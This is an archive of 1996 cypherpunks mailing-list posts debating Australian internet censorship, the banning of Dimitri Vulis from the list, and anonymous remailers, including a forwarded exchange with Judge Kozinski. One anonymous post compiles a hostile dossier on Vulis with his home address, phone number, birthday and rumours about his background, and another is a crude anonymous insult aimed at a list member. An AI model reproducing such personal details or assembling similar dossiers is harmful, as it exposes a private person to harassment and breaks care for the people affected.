PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 6 Nov 1996 00:38:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Censorship in Western Australia
Message-ID: <1.5.4.32.19961106083312.003babac@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Headline:
>> AUSTRALIA - CENSORS STRIKE AT INTERNET, LANS - Western Australia's
   State Government says it will seek to censor all computer
   transmissions of offensive material after its censorship act came
   into force last Friday. [Newsbytes, 67 words]

Probably not as competent as Singapore at enforcement,
but what do people know about it?

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
# Nov. 5 is Guy Fawkes Day - Vote Early and Often, and create Fireworks!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Wed, 6 Nov 1996 00:35:27 -0800 (PST)
To: "Troy M. Barnhart" <barney@rapidnet.com>
Subject: Re: Any Info for Sen. Pressler....
Message-ID: <1.5.4.32.19961106083317.003a2258@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:57 PM 11/4/96 -0700, "Troy M. Barnhart" <barney@rapidnet.com> wrote:
>If anyone has any specific bits of info on cryptography, etc...
>please feel free to send it to me...
>I live in South Dakota...
>Due to circumstances I occasionally see and speak 
>w/ Senator Larry Pressler - (Committee Leader)...

At this point, I think he's now Ex-Senator Pressler,
if I saw the election returns I think I saw.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
# Nov. 5 is Guy Fawkes Day - Vote Early and Often, and create Fireworks!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 5 Nov 1996 23:02:09 -0800 (PST)
To: cypher@cyberstation.net
Subject: Re: Q.E.D. - MONTGOLFIERING, SPOOFS +
In-Reply-To: <Pine.BSI.3.95.961104222712.2559B-100000@citrine.cyberstation.net>
Message-ID: <Pine.SUN.3.94.961106013534.10186A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Nov 1996 cypher@cyberstation.net wrote:

>          I recognize that the vast majority of list readers are
>          sensible human beings trying to better the profession they
>          love and serve the interests they represent.  As such,
>          readers of this thread do not need me, or a claque of
>          snivelers, to determine the probity of the impartations being
>          made. You are capable of determining that for yourselves.

You too, shut up and go away.

>          Preamble:
> 
>          In law school, potential attorneys are drilled in the three
>          prong postulate:
> 
>          1. If you can argue the facts, argue the facts, the
>             evidence.
> 
>          2. If you cannot argue the facts, then argue the law,
>             Shannon and Sneider.
> 
>          3. If you cannot argue the facts, or the law, then attack
>             the opposition, the people presenting the facts.

I don't remember this lecture.  Perhaps I missed it somehow.  I wasn't
sure so I thought I'd ask someone else.  Funny, I called a friend of mine
who went to Harvard, asked him about this lecture.  He seems to have
missed it too.  He was, however, interested to discuss false advertizing
with me.

>             Copyright 1996 by Donald R. Wood. All rights reserved.

I assume you copyright the patterns in your feces too?  It would follow,
as they are equally valuable.

>             Where do we go from here? As you read this, many companies
>             and individuals have purchased, are purchasing, copies for
>             test and evaluation under the newly announced limited
>             moneyback guarantee offer set out in our web site at:
> 
>                       netpriv.com

As you read this three people I've talked to are making official 
complaints to the FTC about this software, the advertizing and the tactics
used.  I'd be happy to introduce others who feel this product borders on
fraud to my law school friend who now co-heads the Advertizing Practices
section.  Feel free to e-mail me.



--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 5 Nov 1996 18:17:14 -0800 (PST)
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: [NOISE]Re: Dr. Vulis; John was right!
In-Reply-To: <Pine.SUN.3.91.961104110543.25737E-100000@beast.brainlink.com>
Message-ID: <Pine.LNX.3.94.961106021327.147A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Nov 1996, Ray Arachelian wrote:

> On Sun, 3 Nov 1996, Derek Bell wrote:
> 
> > -----BEGIN PGP SIGNED MESSAGE-----
> > 
> > 	I'm not happy with the barring of Vulis from the list: sure he was
> > a kook and he posted many ad-hominem messages*, but I feel a mini-FAQ would
> > deal with the matter better. Explain the background to his tantrums** and
> > explain how to filter out messages with various mail packages.
> 
> 
> Right. I can see it now:
> 
>  "Hi, welcome to cypherpunks, it's a realy neat list where we talk about
> crypto and other cool things.  Think of it as a living room or a bar - uh,
> by the way, beware of that stain on the rug called Vulis, he will cause
> lots of flame wars and spew our racist crap, but aside from that your stay
> here will be a pleasant one.  You might want to filter him, here's how..."
> 
> Not cool.
> 

Well, we wouldn't do it like _that_...

just say something like 

"if you feel the need to flame somebody, consider filtering posts from
them instead, here's how..."

and then proceed to show Vulis as the example ;)


 --Deviant
Slowly and surely the unix crept up on the Nintendo user ...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Tue, 5 Nov 1996 07:11:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis is not on cypherpunks any more
In-Reply-To: <847122169.8850.0@fatmans.demon.co.uk>
Message-ID: <199611051403.DAA02078@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Nov 1996 13:15:24 +0000, paul@fatmans.demon.co.uk wrote:

>John, if you, and those who support your actions, claim to be 
>libertarians you need to take a good hard look at what you have done.

I'm in the "those who support" category.  I don't give a damn whether
Dimitri is on the list or not, I can filter if I want to, but since
John's paying for it, he can kick people off, moderate it, forge and
edit posts, or whatever he wants.  Digital signatures can prevent (or
at least detect) some of this (but he could strip the signatures, of
course) and I imagine the list wouldn't last long (would move
elsewhere) if he did this, but it would not be "anti-libertarian"
(dishonest, maybe).  The anti-libertarian side is that of those
list-members who think they have some sort of right to use John's
equipment as they please, for free, and complain when he disagrees.
Well, tough.  He's right and you're wrong.

If you don't like the way John runs the list, there's a very simple
solution: set up your own list, using _your_ computer, and run it the
way you think it should be run.  It sounds like a lot of the people on
this list would prefer your way (the same people, presumably, who
would like to borrow your car without asking, or spend a couple of
months holidaying in your house...)

>This is a distinctly "big cypherpunkish" move and really cannot be 
>condoned even bearing in mind the inane and wearisome behaviour of 
>Dr. Vulis.

Nonsense.  John Gilmore is not censoring anyone's mail.  He can't
possibly censor your mail (unless he runs your ISP...but then you can
always move to another ISP).  You're free to correspond with Dimitri
to your hearts content, and John has nothing to say about it...unless
you try to make him pay for it.  [If you think differently, please let
me know.  I'll be quite happy to tell my ISP to send my bills to you!
:-)]

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Reality is bad enough, why should I tell the truth?
		-- Patrick Sky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Wed, 6 Nov 1996 01:40:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9611060928.AA11496@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


The arrival of warm weather is heralded by the 
pig shit (or whatever kind of shit Intel swines 
have for brains) getting soft in Timothy 
C[rook] May's mini-cranium and the resulting 
green slime seeping through key cocaine- and 
syphilis- damaged nose and onto his keyboard.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Wed, 6 Nov 1996 01:40:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Judge Kozinski responds to our responses
Message-ID: <199611060939.EAA118362@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com, jmr@shopmiami.com
Date: Wed Nov 06 16:38:58 1996
Dear cypherpunks:

Judge Alex Kozinski has mercifully (unless you consider _this_ noise, too) 
given me permission to post the following message. This will be my last 
posting signed by this key. I will now attempt to implement my new one, 
hopefully without denying myself access to Pronto at the same time.
JMR
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To start with, we should probably thank the people who helped.

Black Unicorn, Mike McNally, Declan McCullagh, Loren Rittle, Lynne L.
Harrison, Tim May, Lucky Green, Greg Broiles, A. Michael Froomkin, and E.
Allen Smith all had good thoughts to share, and I am probably leaving
someone out. Oh well. Anyway,

Judge Kozinski wrote:

> Jim:  Thanx for forwarding the various messages which I have
> found eye-opening in many respects.  It's take me a while to
> review and digest it all and I find there are certainly many
> aspects of the anonymity problem that I either was not
> aware of or had not fully appreciated.  Although I cannot
> quite say I'm entirely persuaded on this issue, I think we
> may be a lot closer.  Rather than responding to individual
> messages (several of which made related points) I will give
> you my reaction to what I thought were the most important
> points.
>
> 1.  I agree entirely that you should be able to post
> anonymously to a list-serv or discussion group.  Anonymity
> there may encourage people to express unpopular views, and
> there is no offsetting fear that this will be viewed as an
> invasion of privacy by anyone.  We have a long tradition of
> anonymous or pseudonymous political tracts (e.g. Federalist
> Papers) and there is no reason not to continue this in the
> electronic medium.  Indeed, as suggested by one of the
> messages you forwarded, there may be greater reason because
> messages posted to discussion groups do get retained and
> indexed for posterity.
>
> 2.  I also agree that it should be possible to have mutually
> agreed-upon anonymity--i.e. I write to you and you write to
> me and we both know who we are, but nobody else does.  No
> problema--it's nobody else's business.
>
> 3.  I still have some difficulty with direct mailing of
> anonymous messages to individual mailboxes.

Actually, having run a remailer and seen some abuse for a while, I do too.
Respected cypherpunks are working hard on this right now. I think what we
would all like to eventually see is a "default off" situation, with no mail
(or at least the warning message I mentioned before as a first message to
new recipients) rather than default-on. Unfortunately, e-mail is a
default-on situation and so (for now) are anonymous remailer messages for
first-time recipients, at this early stage in their evolution. I am
confident that this situation will change in the future, as more
sophisticated software is written.

> The arguments
> in favor if doing so are good but not airtight.  Here are my
> responses to the ones I thought were most compelling:
>
> a.  You have anonymous snail-mail and telephone calls--why
> not e-mail?  The truth is, anonymous snail-mail and
> telephone calls are also an invasion of privacy, but there
> is not much we can do about them.  Someone asked whether I
> objected to getting anonymous snail mail if it was not
> threatening.  The answer is YES, just like getting an
> anonymous phone call is objectionable.  When the person who
> communicates with you insists on retaining anonymity, there
> is always an implicit threat--they know who you are, but you
> don't--you feel vulnerable, you doubt their motives, you
> have difficulty knowing whether to trust their
> representations.  Anonymous complaints against co-workers
> and supervisors was a standard way to get people into big
> trouble in Communist Romania when I was growing up.

The thing is, I find many anonymous messages that I see on the list not too
valuable initially, and the anonymous or pseudonymous poster, in order to
build some "reputation-capital," has to stay around a while and post
interesting stuff, like Black Unicorn or Lucky Green. This is, IMO, as it
should be. There is an incredibly funny humorist lurking on the list, who
posts the "cypherpunk enquirer" anonymously, and I can send you a few of
those if you like. [The judge hasn't asked me to, yet. He doesn't know what
he's missing. :) ]

We certainly don't want the situation you were all-too familiar with growing
up, but as a remailer-operator I find that I must take the bitter with the
sweet, and I am fully ready to admit that about 1/3 of the messages that go
through WinSock are abusive, judging by the stuff I see in the reject bin.
That's one of the reasons Joey (the other operator, and the author of the
WinSock Remailer software) and I went to PGP-encrypted messages only, we
felt that abusers were less likely to learn and use PGP.

> Now, the fact that we can't stop anonymous snail-mail and
> telephone calls doesn't mean we shouldn't stop anonymous
> e-mail if we think it's a bad thing.  The fact that an evil
> cannot be remedied in its entirety does not mean that we
> should not remedy the part that we can.  Perhaps the answer
> is that the post office should not accept mail unless there
> is a clear indication of who the sender is on the upper left
> hand corner of the envelope.  In any event, I find the
> argument based on analogies to snail-mail and telephone not
> entirely persuasive.

I feel that the fact that an evil is this hard to remedy through traditional
legal means suggests that a very hard look at technological means is in
order. I hope that we can both agree that in many cases, technology can
adapt to situations and problems faster and cheaper than law can.

> b.  You can't really ever prevent anonymity because people
> can get e-mail accounts anonymously--paying for them in cash.
> Arguments based on futility are always suspect.  Sure, some
> people will circumvent any laws or regulations, but that's
> not a reason not to have laws.  For one thing, most people
> don't get anonymous accounts and don't know how to do so.

True.

> Even if you do get an anonymous account, you can be shut
> down if you break the rules and then you'll have to go
> somewhere else.

This point, I believe, is actually in "my" side's favor. There are time
costs to this kind of setup stuff that even the abusers may dislike, and
abusers' names and methods tend to get put on lists that ISPs look at. I am
sure that privacy providing ISPs look at these lists.

> And maybe all this suggests is that we
> ought to require e-mail providers to obtain id from their
> patrons and require payment by check or credit card.  I am
> not suggesting these measures, mind you, but insofar as
> futility is used as an argument against regulation, it can
> equally well serve as an argument for MORE regulation.

I agree that it's not our most powerful argument, but it is a consideration,
because with futility comes high cost and disrespect for the law. Witness
the failed drugwar and the lack of respect for the law it has engendered,
even among government agencies. Often, this disrespect for the law comes
with no legal or political cost to perpetrators (unless you count my ranting
as a political cost).

> c.  People can use filters.  Well, yes, maybe.  But most
> people don't know how to use filters.  I consider myself
> above-average in my e-mail sophistication, and I don't know
> how to use filters. I could probably figure it out, but
> most people who use aol or prodigy probably have no ability
> to install a filter even if they knew how they worked.  In
> any event, I find it a little troublesome to put the burden
> on the recipients to adopt a hi-tech solution. And who says
> there aren't ways around most common filters--or such
> ways won't be developed--which would put recipients in a
> technology race with anonymous mailers?

True, and the abusers already _are_ in a technology race with the
remailer-operators, as I see just about every day on the remailer-operators
list. I have serious doubts that yet-another law would either change or
improve the situation.

               *        *         *

> Anyway, thanx for a stimulating series of messages.  I do
> think we've made some progress.  And we'll keep the channels
> of communication open.

The pleasure has been all mine, Judge Kozinski.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMoEFd21lp8bpvW01AQHR1AQAib06JhpWx06H6Pr25uuMUj6fQVXZIYfc
KeUdP/QSSWQHfIwxs2SX1a++SCbnx6Ev//ninb7Q8F5kj56mk0yq0SE/ID91WgwJ
iFEr+2V1oTf+JZISh68F/a/fPBrP8GL8rjUce+WYhiY704rlsNyr5L9UhtylkzNg
GM5Ml/A7qjc=
=tVan
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 6 Nov 1996 04:49:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Censorship in Western Australia
Message-ID: <Pine.SUN.3.91.961106044839.16537A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain






---------- Forwarded message ----------
Date: Tue, 05 Nov 1996 21:59:33 +1100
From: Irene Graham <rene@pobox.com>
To: fight-censorship@vorlon.mit.edu
Subject: Re: Australia drafts Net rating system

On Mon, 4 Nov 1996 18:53:24 -0800 (PST), Declan McCullagh <declan@eff.org>
wrote:
>---------- Forwarded message ----------
[...]
>http://www.smh.com.au/computers/news/961105-news03.html
[...]
>Under the code, which is being developed by the
>Internet Industry Association of Australia (INTIAA),
>content will be classified under the existing code used
>by the Office of Film and Television Classification.
>"R" or "X" rated material would have to be clearly
>identified and provided only to registered subscribers.
[...]

The subject line of this thread is misleading, which is understandable
given the content of the newspaper report. "Australia" is not drafting a
Net rating system (yet anyway). I doubt INTIAA actually is either.

INTIAA purports to be (i.e. wants to be) the "peak Internet industry body"
in Australia. However their code *does not* have the support of much of the
"industry". The present stage of the fight in Australia is, not against
government censorship, but against "privatised" censorship.

There is presently no Net content rating system based on the OFLC
classifications, nor with any luck is there likely to be. The Australian
Broadcasting Authority (ABA) in its July report on Net regulation was of
the view that that system is unworkable for on-line content (which is
correct) and proposed the development of a purpose-built classification
system. Unfortunately it appears the director(s) of INTIAA have not read
that report. 

The following extract from Electronic Frontiers Australia's response (of 22
Oct 96) to the ABA report tells the rest of the story about INTIAA and its
code:

	"It appears that the ABA has been influenced by a particularly
complicated proposed industry code of practice drafted by Patrick Fair of a
Sydney corporation "The Internet Industry Association of Australia".  That
proposed code of conduct, released on the 10th September 1996, proposes a
top-heavy industry body, drawing extensive levies from the Internet access
providers in order to sustain a professional council as well-funded and
well-staffed as a national professional body.  INTIAA was established with
board members representing hardware and software vendors, a national law
firm and several large Internet access providers.  Other members of the
company include media and the Taxation Institute of Australia.  It is fair
comment that INTIAA represents a sector of the market with deep pockets and
contacts in government, as indeed the Minister for the Communications and
the Arts launched INTIAA on the 15th December 1995. The proposed code of
practice makes use of the ABA's favoured PICS web page rating standard
compulsory , creates an Administration Council with a government appointee
as Chair and no direct voting by member service providers on changes to
that Code.

	For those worried about censorship of the Net through the back door, the
proposed Code places on service providers the obligation to block
"X-rated" material as if it were child pornography. A further problem for 
service providers is the requirement that they report "illegal" sites to
the authorities , report "RC" violations to other site administrators and
delete users to enforce compliance with censorship.

	INTIAA's code of practice does not represent a consensus within the
industry.  There are State Internet Associations (WA Internet
Association, South Australian Internet Association,  ACT Internet
Association) which do not subscribe to such a bureaucratic system and
which instead are developing codes of practice which more fully fulfil
industry aspirations and conform more fully to industry experience 
[...and...] make it quite clear that an Internet access provider cannot be
held responsible for content not originating on his or her system under any
circumstances. 
	[...]
	The gloss and complexity of the INTIAA code by comparison has obviously
promoted to the ABA the notion that the industry can self-fund a policing
function as the government may direct."

The INTIAA code is a threat to free speech on the Net (at least in Oz)
equivalent to, and possibly worse than, government censorship.

Regards
Irene

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Irene Graham, Brisbane, Queensland, Australia.  PGP key on h/page.
The Net Censorship Dilemma: <http://www.pobox.com/~rene/liberty/>
"A year from now you may wish you had started today."  Karen Lamb.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 5 Nov 1996 23:06:52 -0800 (PST)
To: cypherpunks <Adamsc@io-online.com>
Subject: Re: just what we #$%^&* needed from big brother....
In-Reply-To: <19961106015118734.AAA249@localhost>
Message-ID: <Pine.BSI.3.95.961106053612.6973A-100000@usr03.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Nov 1996, Adamsc wrote:

> On Mon, 04 Nov 96 19:15:39 +0000, attila@primenet.com wrote:
> 
> >Welcome to 1984+  what else with useless and illegally constituted
> >bureaucrats add to their total infringement of every facet of our life. 
> >
> >-.NEW SYSTEM LINKS LENDERS, IRS
> 
> >-.information for the previous couple of years.  If the cross-check turns up a
> >-.more than $10,000 discrepancy between the earnings claimed on the application
> >-.and those declared for tax purposes, the IRS has the option of pursuing the
> 
> This isn't actually the end of the world.  In fact we should be applauding
> their efforts to make their abominable system more efficient.  Whether it
> should be scraped is another issue.   In other words, as long as they are
> going to do it, they might as well do it right.  
> 
	my point is more towards: "...here goes another direct batch of
    information directly into the federal computers --home location and
    the link between real and 'imagined' income which immediately opens
    the door for the IRS CID to start a tax-fraud investigation which
    quickly leads to liens on your property, etc. while they audit the
    living life out of you.  just one more piece, a major one at that, in
    the national databank ready to persecute you....

_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 5 Nov 1996 23:10:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Vulis profileVulis profile
Message-ID: <199611060457.FAA26857@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


I had some free time this morning, and just for fun, thought I'd 
create a brief Net profile of our friend Dr. Vulis.  Here's what 
I found (sources included):

Dimitri Vulis
#4k Burns St, Forest Hills,NY 11375-3506
(718)261-6839
Source: http://www.yahoo.com (Four11 people search)

Birthday: December 29
Source: http://www.boutell.com/birthday.cgi/december/29

D&M Consulting Services (DM-DOM)
   67-67 Burns Street
   Forest Hills, NY 11375
   Domain Name: DM.COM
   Administrative Contact:
      Administration, PSINet Domain  (PDA4)  
psinet-domain-admin@PSI.COM
      (703) 904-4100
   Technical Contact, Zone Contact:
      Network Information and Support Center  (PSI-NISC)  
hostinfo@psi.com
      (518) 283-8860
   Record last updated on 31-Oct-96.
   Record created on 19-Jun-91.
   Domain servers in listed order:
   NS.PSI.NET                   192.33.4.10
   NS2.PSI.NET                  38.8.50.2
Source: InterNIC

Q: Who is Dimitri Vulis? 
A: Dimitri is an XSoviet immigrant who is enrolled (or used to be 
enrolled) in CUNY, and who is a computer professional involved 
i.a. in unicode matters. The realspace Dimitri is a polite person 
and a devoted family head.  It's cyberspace image is not nearly 
as nice, unfortunately. 

He harasses people all over the net with the most offensive sorts 
of messages, and uses dirty tricks to retaliate to the people who 
do get offended. Among his accomplished feats is a series of 
articles about cat-eating dogs posted to rec.pets.cats (which 
caused a wave of complaints and made him lost his CUNY account) ; 
a series of porno binaries with obscene comments about his 
opponents posted to math-related newsgroups (he lost another 
academic account, at fordham.edu, after this scandal); and a 
series of racist articles denigrating all aspects of romanian 
life and culture which used to haunt the romanian newsgroup for 
years. 

Of course most of his net.bile is spilled over his fellow 
XSoviets, particularly of Jewish origin (such as Michael 
Verbitsky, Boris Veytsman, Vlad Rutenberg or myself, as well as 
all Brighton Beach together); and a lot of stuff comes out from 
his alleged aliases in bwalk.dm.com, aol.com and fly.harvard.edu. 
Some of these aliases match the names of his opponents, as I 
already mentioned.  Sometimes not only the names but also 
addresses match (although paths don't). 

Dimitri Vulis also advertises the capabilities of his site for 
forging and cancelling articles. Sometimes he shrewdly comments 
articles of his own saying : "This article is most certainly 
forged, after all I spent a lot of time teaching you how to 
forge... but I nevertheless like this article's content". 
Source: 
http://www.math.harvard.edu/~verbit/scs/cranks/from-Shlomo.html
(much more there too)

AUTHOR PROFILE: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
510 articles posted between 1995/06/29 and 1996/11/02. 
71 % followups. 
Number of articles posted to individual newsgroups (slightly 
skewed by cross-postings): 
          132 misc.jobs.misc 
          67 news.admin.net-abuse.misc 
          67 news.groups 
          40 mail.cypherpunks 
          32 nyc.food 
          18 soc.culture.russian 
          13 news.admin.misc 
          12 nyc.general 
          10 news.admin.censorship 
          9 news.admin.policy 
          8 alt.censorship 
          7 alt.usenet.kooks 
          7 soc.culture.pakistan 
          6 alt.revenge 
          5 comp.os.ms-windows.nt.advocacy 
          5 soc.culture.soviet 
          4 alt.sex.plushies 
          4 sci.math 
          4 sci.physics 
          4 talk.politics.medicine 
          3 alt.folklore.computers 
          3 alt.security 
          3 comp.lang.ada 
          3 comp.security.misc 
          3 sci.crypt 
          2 alt.nocem.misc 
          2 alt.sci.physics.plutonium 
          2 aus.flame 
          2 comp.os.ms-windows.advocacy 
          2 comp.unix.advocacy 
          2 microsoft.public.netiquette 
          2 soc.culture.israel 
          1 alt.2600 
          1 alt.anonymous 
          1 alt.bible 
          1 alt.computer.consultants 
          1 alt.consumers.experiences 
          1 alt.fan.bill-gates 
          1 alt.fan.my-big-hairy-penis 
          1 alt.privacy 
          1 alt.shenanigans 
          1 alt.society.neutopia 
          1 aus.general 
          1 comp.ai 
          1 comp.mail.uucp 
          1 comp.os.ms-windows.nt.misc 
          1 comp.os.ms-windows.win95.setup 
          1 comp.sys.mac.advocacy 
          1 humanities.language.sanskrit 
          1 misc.entrepreneurs 
          1 misc.invest 
          1 news.newusers.questions 
          1 nj.misc 
          1 nyc.seminars 
          1 rec.humor 
          1 rec.motorcycles 
          1 sci.psychology.psychotherapy 
          1 soc.motss 
          1 tor.general 
Source: http://www.dejanews.com profile

Dimitri Vulis:
Contrib. post:
 whose obnoxious, derivative and not-very-funny Soviet emigre 
jokes from Brighton Beach were a weekly feature about a year ago 
on rec.humor . He ignored completely any requests to stop. 
Eventually he started getting flamed in demotic Russian-quite fun 
for those of us who could read it.
- Dan "And to think he felt it important enough to waste his two 
hours of daily connect time on it" Case
--
 so what _is_ the deal with vulis?  is "russian emigre" a 
codeword for "jew", or for "russian emigre", or for something 
else?  (if i recall correctly, minor and now somewhat reformed 
net.loon mikhail zeleny claimed rather convincingly that vulis's 
posts contained certain tell-tale phrases which are highly 
un-idiomatic in english ("dandruff-covered" was one of them, i 
think) which were dead giveaways of classic pathological russian 
anti-semitism.)  so is vulis russian?  an emigre?  a jew in some 
sense?  self-hating?  maybe a self-hating russian jewish emigre 
who hates only the jewish half of themself?  or maybe they hate 
the russian half too?  are they now or have they ever been, while 
residing in america, on the payroll of any branch of any soviet 
or russian government?  did they stop posting russian emigre 
jokes when the paychecks stopped coming?  are they a zhirinovsky 
supporter now?  the most recent messages posted by vulis
that i have seen seem designed mainly to convince people that 
both zhirinovsky and valery fabrikant are (russian?) jews.  (it's 
very likely true in fabrikant's case, at least.)  maybe vulis is 
a self-hating supporter of zhirinovsky and fabrikant?
--
Posts on soc.culture.soviet, and is apparently something of an 
institution there; likes to stir things up, and to flame and/or 
troll people. I'm not up on which sides are good and/or bad on 
s.c.s, which among other things seems to have been ravaged by 
Serdar Argic for a long time as well, driving away many
of the gentler posters. Is currently engaged in flamewar with 
Peter V. Vorobieff there. Posts from dlv@CUNYVMS1.GC.CUNY.EDU 
(Dimitri Vulis, CUNY GC Math).
Source: 
http://www.math.uiuc.edu/~tskirvin/home/legends/legends3.html

Dimitri Vulis's barcode font
ftp: ctan: tex-archive/fonts/barcodes/barcodes.mf
There is a mailing list, rustex-l, for discussion of typesetting
Cyrilic-based languages.  To subscribe, send mail to 
listserv@ubvm.bitnet
containing the text
 SUBSCRIBE RUSTEX-L <your name here>
or mail Dimitri Vulis, DLV%CUNYVMS1.BITNET@cunyvm.cuny.edu [or 
dlv@dm.com?]
Source: http://wsspinfo.cern.ch/faq/fonts-faq/metafont-list

Bar code fonts  ymir.claremont.edu      by Dimitri Vulis 
[anonymous.tex.mf]
BibTeX eedsp.gatech.edu for MS-DOS  v99 by J. Demel and Dimitri 
Vulis
Source: 
http://www.clinet.fi/pd/doc/texts/TeX-FAQ-supplement_(part_2_of_3
)
(this FAQ is dated 10 May 93)

Server The files of type para used in the index were: 
/u3/wais/mirror/cissites/cissites.txt A list of contacts for most 
known organizations in the former Soviet Union who either have or 
plan to have e-mail connections. Provided by the SUEARN-L list, 
SUEARN-L@UBVM.BITNET. Keywords: USSR, CIS, Russia, Latvia, 
Lithuania, Estonia, Baltic, Moscow, Leningrad, Siberia. The 
original document is stored on 
impaqt.drexel.edu:/pub/suearn/misc/cissites.txt and is available 
for anonymous FTP. 
>From the front matter: * The Authoritative Soviet E-Mail 
Directory and Guide ** For more information, subscribe to the 
SUEARN-L mailing list, or send e-mail to Michael Meystel or 
Dimitri Vulis (c) 1992 All rights reserved 
This file contains contact information (correct name / address / 
phone / fax #... possibly e-mail address) for sites of interest 
in the Commonwealth of Independent States (CIS). We occasionally 
get asked questions like 'What is the Russian name of IAS?' or 
'What is the postal address of St. Petersburg State U's math 
faculty?' or 'What does IPPI stand for?'. Over the years I've 
collected a fairly complete electronic address book of addresses 
of Soviet sites where mathematical research is done, which I 
gladly share. Sergej Gelfand and Don Parsons have kindly 
contributed their address lists (respectively, more math and 
oncology). An even more complete version of such file, listing 
sites of possible interest to people in other fields, and freely 
available on the Internet, would be very useful to many. Please 
send additions, corrections, suggestions, etc to: CISMAP@DM.COM I 
can't acknowledge everything, but I will try to read every 
e-mail. Dimitri Vulis ) 
Source: http://www.elvis.ru/wais/c.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 6 Nov 1996 06:52:09 -0800 (PST)
To: snow <snow@smoke.suba.com>
Subject: Re: Censorship on cypherpunks
In-Reply-To: <199611042347.RAA08151@smoke.suba.com>
Message-ID: <3280A5D9.35E8@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


snow wrote:
> > > It's only authoritarianism if the government is involved.
> > > Clearly, the government isn't involved in this matter.

[snippo]

> The closest anology I can find in real life would be a bar, were people
> any person (well, any person old enough, but we'll ignore that) is allowed
> to wander in, order a drink, watch TV, shout at the screen ocassionally
> eat the pretzels and etc. Off in the corner you have a drunk dancing off
> time to the noise on the jukebox, but most of the patrons can ignore him.
> Vulis is sitting square in the middle of the bar, sloshed to the gills
> throwing pretzels and peanuts at both fans of the opposing team, and
> fans of his team. Screaming at the top of his lungs about the quarterback
> for a totally different team fumbling the ball in the 1970 world series.

[snip, snip]

A vastly more accurate analogy is that the "Doctor" is not in fact inside of the bar,
as none of the cypherpunks are inside of anyone's home but their own.  Vulis is some-
where else, sending his brand of beer to the bar in competition with a number of
other "vendors".  Customers and vendors alike complain that Vulis' bottles have
offensive portraits on them, possibly famous sports figures in an unflattering light.

So the bar owner bans Vulis' beer, but he sends it in anyway through a third party,
and several patrons discover that they can easily remove the outer label from the
bottle and see the original portraits.

There are similarities to Prohibition here.

Now the bar owner, being the owner, can throw out anyone he wants to anytime, and he
gets away with this with little or no trouble lawsuit-wise, since the courts are much
more lenient with owners of bars and rock-n-roll venues that with, say, Denny's
Restaurants.

As I've said before, all forums on the net can be arranged at some point in the future
to be "privately" owned, and the question is, can there be a free speech forum where
you won't be arbitrarily banned?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 6 Nov 1996 06:58:24 -0800 (PST)
